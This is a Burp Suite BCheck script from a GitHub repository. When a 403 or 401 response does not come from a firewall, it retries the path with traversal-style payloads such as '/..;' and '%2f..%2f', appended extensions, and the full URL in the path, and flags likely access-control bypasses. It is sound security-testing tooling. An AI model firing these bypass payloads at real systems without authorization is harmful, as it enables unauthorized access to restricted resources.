bchecks/Path-bypass.bcheck at main · KaustubhRai/bchecks · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#Verified: Yes

metadata:
    language: v2-beta
    name: "Path-bypass"
    description: "Trying out techniques to bypass a restricted path discovered in the application. Except firewall 403 respones to avoid a lot of junk traffic."
    tags: "active", "bypass", "path", "forbidden", "403"
    author: "Brumens"

define:
    desc = "Possible that a bypass technique worked and that we accessed a restricted path in the application"
    reme = "Manual testing is required to confirm the issue"
    trackHeader = "X-BCheck"
    trackValue = "path-bypass"

run for each:
    payload =
        "/",
        "//",
        "/..;",
        "/..",
        "%2f..%2f",
        "/notfound/%2f..%2f../",
        "/;",
        "/.",
        "__EXT_PAYLOAD__.json",
        "__EXT_PAYLOAD__.html",
        "__FULL_URL__"

given request then
    #Check if we triggered a 403/401 path that isen't a response from a firewall (Akamai, CloudFlare, CloudFront and pattern detection)
    if {latest.response.status_code} matches "40(3|1)" and not( ("What happened?" in {latest.response.body} and "security" in {latest.response.body}) or "Ray ID:" in {latest.response.body} or "CloudFront" in {latest.response.body} ) then

        if {payload} is "/" then
            send request:
            method: "GET"
            path: {latest.request.url.path}
            replacing headers: `{trackHeader}`:`{trackValue}`

        #Extension bypass technique:
        else if "__EXT_PAYLOAD__" in {payload} then
            #Check if the path end with a forward slash:
            if {latest.request.url.path} matches "^.*\/$" then
                send request:
                    method: "GET"
                    path: `{regex_replace({latest.response.url.path}, "\/$", {regex_replace({payload}, "__EXT_PAYLOAD__", "")})}`
                    replacing headers: `{trackHeader}`:`{trackValue}`
            else then
                send request:
                    method: "GET"
                    path: `{latest.response.url.path}{regex_replace({payload}, "__EXT_PAYLOAD__", "")}`
                    replacing headers: `{trackHeader}`:`{trackValue}`
            end if

        #Use full URL in path technique:
        else if "__FULL_URL__" in {payload} then
            send request:
        method: "GET"
        path: `{latest.request.url}`
                replacing headers: `{trackHeader}`:`{trackValue}`

        #Prefix payload bypass technique:
        else then
            send request:
                method: "GET"
                path: `{payload}{latest.response.url.path}`
                replacing headers: `{trackHeader}`:`{trackValue}`
        end if

        #Check if any technique was capable of bypassing the restricted endpoint:
        if not( {latest.response.status_code} matches "(40[0134]|503)" ) and not( {payload} is "/" ) then
            report issue and continue:
            severity: high
            confidence: tentative
            detail: {desc}
            remediation: {reme}
        end if
    end if